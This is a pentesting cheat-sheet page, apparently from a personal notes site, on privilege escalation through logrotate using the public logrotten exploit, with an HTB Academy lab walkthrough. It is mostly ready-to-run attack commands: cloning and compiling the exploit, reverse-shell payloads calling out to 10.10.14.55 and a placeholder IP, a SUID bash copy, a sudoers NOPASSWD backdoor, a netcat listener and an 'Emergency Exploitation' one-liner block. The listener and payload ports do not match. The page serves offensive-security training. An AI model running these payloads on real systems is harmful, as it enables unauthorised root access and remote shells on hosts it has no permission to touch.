📜Logrotate Exploitation

🎯 Overview

Logrotate vulnerability (CVE-2011-1548, CVE-2011-1154) in specific versions allows privilege escalation through log file manipulation and race condition exploitation.

🔍 Prerequisites

Required Conditions

# 1. Write permissions on log files
ls -la /var/log/ | grep $(whoami)

# 2. Vulnerable logrotate version
logrotate --version
# Vulnerable: 3.8.6, 3.11.0, 3.15.0, 3.18.0

# 3. Logrotate runs as root (via cron)
ps aux | grep logrotate
cat /etc/cron.daily/logrotate

Configuration Analysis

# Check logrotate configuration
cat /etc/logrotate.conf

# Important settings
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

# Check specific log configurations  
ls /etc/logrotate.d/
cat /etc/logrotate.d/*

🚀 Exploitation with Logrotten

Download and Compile Exploit

# Get logrotten exploit
git clone https://github.com/whotwagner/logrotten.git
cd logrotten

# Compile exploit
gcc logrotten.c -o logrotten

Create Payload

# Simple reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.14.55/1222 0>&1' > payload

# Alternative payloads
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > payload
echo 'echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > payload

Execute Exploit

# Setup listener on attacker machine
nc -nlvp 9001

# Run logrotten exploit
./logrotten -p ./payload /tmp/tmp.log

# For create mode (most common)
./logrotten -p ./payload /var/log/dpkg.log

# Wait for logrotate execution (usually daily)

HTB Academy Lab Example

# 1. Transfer exploit to target
git clone https://github.com/whotwagner/logrotten.git
scp -r logrotten/ htb-student@target:~/

# 2. Compile on target
ssh htb-student@target
cd logrotten/
gcc -o logrotten logrotten.c

# 3. Create payload for flag extraction
echo "cat /root/flag.txt > /home/htb-student/flag.txt" > payload

# 4. Trigger exploit
echo test >> /home/htb-student/backups/access.log
./logrotten /home/htb-student/backups/access.log -p payload

# 5. Read extracted flag
cat /home/htb-student/flag.txt

🔧 Configuration Mode Detection

Determine Logrotate Mode

# Check main config for mode
grep "create\|compress" /etc/logrotate.conf

# Common modes:
# create    - Creates new log file with specified permissions
# compress  - Compresses old log files

Mode-Specific Exploitation

# For create mode
./logrotten -p ./payload /target/log/file

# For compress mode  
./logrotten -c -p ./payload /target/log/file

🕐 Timing and Execution

Cron Schedule Analysis

# Check when logrotate runs
cat /etc/cron.daily/logrotate
cat /etc/cron.d/ | grep logrotate

# Check last rotation status
cat /var/lib/logrotate.status

Manual Triggering (if possible)

# Force logrotate execution (requires privileges)
sudo logrotate -f /etc/logrotate.conf

# Debug mode (safe testing)
logrotate -d /etc/logrotate.conf

🔍 Detection & Enumeration

Logrotate Vulnerability Check

#!/bin/bash
echo "=== LOGROTATE VULNERABILITY CHECK ==="

echo "[+] Logrotate version:"
logrotate --version

echo "[+] Vulnerable version check:"
version=$(logrotate --version 2>/dev/null | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
if echo "$version" | grep -qE "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"; then
    echo "  [!] VULNERABLE VERSION: $version"
fi

echo "[+] Writable log files:"
find /var/log -writable 2>/dev/null | head -10

echo "[+] Logrotate configuration:"
grep "create\|compress" /etc/logrotate.conf 2>/dev/null | grep -v "#"

echo "[+] Logrotate cron job:"
ls -la /etc/cron.daily/logrotate 2>/dev/null

Log File Analysis

# Find writable log files
find /var/log -type f -writable 2>/dev/null

# Check log file permissions
ls -la /var/log/ | grep $(whoami)

# Log rotation status
cat /var/lib/logrotate.status | head -10

🔑 Quick Reference

Immediate Checks

# Version vulnerability
logrotate --version | grep -E "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"

# Writable logs
find /var/log -writable 2>/dev/null

# Configuration mode
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

Emergency Exploitation

# If vulnerable version + writable logs found
git clone https://github.com/whotwagner/logrotten.git
cd logrotten && gcc logrotten.c -o logrotten
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' > payload
./logrotten -p ./payload /writable/log/file

⚠️ Exploit Limitations

Requirements Summary

Vulnerable logrotate version (specific versions only)
Write permissions on target log files
Logrotate execution as privileged user
Timing dependency on cron schedule

Success Factors

Daily cron execution - Most common schedule
Large log files - More likely to trigger rotation
Active logging - Files that actually get rotated
Correct configuration mode - create vs compress

Logrotate exploitation leverages race conditions in log management - when logrotate runs as root with writable log files, the logrotten exploit can hijack the rotation process for privilege escalation.

PreviousDocker Container Escape NextMiscellaneous Techniques

Last updated 4 months ago